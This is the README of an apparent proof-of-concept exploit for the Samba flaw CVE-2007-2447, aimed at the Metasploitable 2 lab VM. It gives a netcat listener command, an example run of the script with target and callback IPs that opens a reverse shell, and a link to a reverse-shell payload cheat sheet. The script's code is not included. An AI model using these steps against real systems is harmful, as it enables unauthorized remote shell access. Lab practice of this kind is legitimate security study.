## CVE-2007-2447
To test the script I recommend you the virtual machine "metasploitable 2" available [here](https://sourceforge.net/projects/metasploitable/files/Metasploitable2/).
The script will display a reverse shell if the exploit works. To get the connection, just open a netcat session like :
```
netcat -lnvp <port>
```
## Table of contents
* [Exemples](#Examples)
* [Requirements](#requirements)
* [Payloads](#payloads)
## Examples
```
py CVE-2007-2447.py 192.168.1.38 1337 192.168.1.14
```
and on my netcat :
```
netcat -lnvp 1337
```
Result :
netcat :

and on the script:

## Requirements
- mysmb
- platform
- sys
- os
## Payloads
I used a payload of a cheat-sheet. The link is available [here](https://highon.coffee/blog/reverse-shell-cheat-sheet/#python-reverse-shell).
You can replace it with other payloads.
[4.0K] /data/pocs/d87e680ace58d9fc2274e0b89555f586ab7b5c5f
├── [3.7K] CVE-2007-2447.py
└── [ 999] README.md
0 directories, 2 files